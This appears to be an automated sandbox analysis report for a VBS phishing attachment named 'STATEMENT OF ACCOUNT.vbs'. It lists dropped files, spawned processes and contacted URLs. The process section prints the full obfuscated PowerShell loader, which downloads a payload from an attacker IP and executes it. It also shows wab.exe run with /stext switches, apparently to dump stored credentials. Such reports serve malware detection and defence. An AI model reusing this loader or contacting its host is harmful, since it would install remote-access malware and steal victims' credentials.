Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
STATEMENT OF ACCOUNT.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asrbhln5.pt5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjp4vb4n.fhi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nggbinth.znm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqjjre0d.eq3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv3B88.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv5123.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Fejdede.ell
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees
Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising
Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic
Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations
Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes
Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For(
$Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers,
$Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego
AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs
Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr
A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek
igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf
bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg
OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0
str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma
Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints
' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu
Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge
Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg
AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin
bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig
');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu
AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane
EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil)
Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc
lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl:
Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe
Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP
P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi
ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl
Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye
DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem
strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne
($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska
arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr
B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt
Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi
ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz,
Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints
'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT
Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs
Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter
PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de
BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK
Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh
Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil
GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg
.arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa
aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern
') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu
fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage
erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot
Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd
e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho
mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka
plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea
easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$
LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri
Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc
Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft
.kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh
fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag
ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev
BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b
LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl
n ');Skildrerne $Reststraffenes;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees
Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising
Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic
Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations
Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes
Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For(
$Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers,
$Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego
AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs
Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr
A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek
igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf
bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg
OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0
str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma
Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints
' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu
Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge
Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg
AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin
bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig
');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu
AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane
EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil)
Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc
lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl:
Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe
Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP
P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi
ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl
Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye
DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem
strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne
($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska
arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr
B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt
Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi
ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz,
Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints
'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT
Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs
Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter
PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de
BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK
Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh
Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil
GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg
.arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa
aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern
') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu
fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage
erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot
Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd
e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho
mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka
plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea
easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$
LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri
Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc
Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft
.kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh
fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag
ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev
BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b
LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl
n ');Skildrerne $Reststraffenes;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
103.237.87.159
|
|
||
|
http://103.237.86.247/Udmagret.hhk
|
103.237.86.247
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
|
unknown
|
||
|
http://www.imvu.comta
|
unknown
|
||
|
https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
http://103.237.86.247
|
unknown
|
||
|
http://103.237.86.247/Udmagret.hhkXR
|
unknown
|
||
|
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://103.237.86
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
|
unknown
|
||
|
http://103.237.86.247/U
|
unknown
|
||
|
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
|
unknown
|
||
|
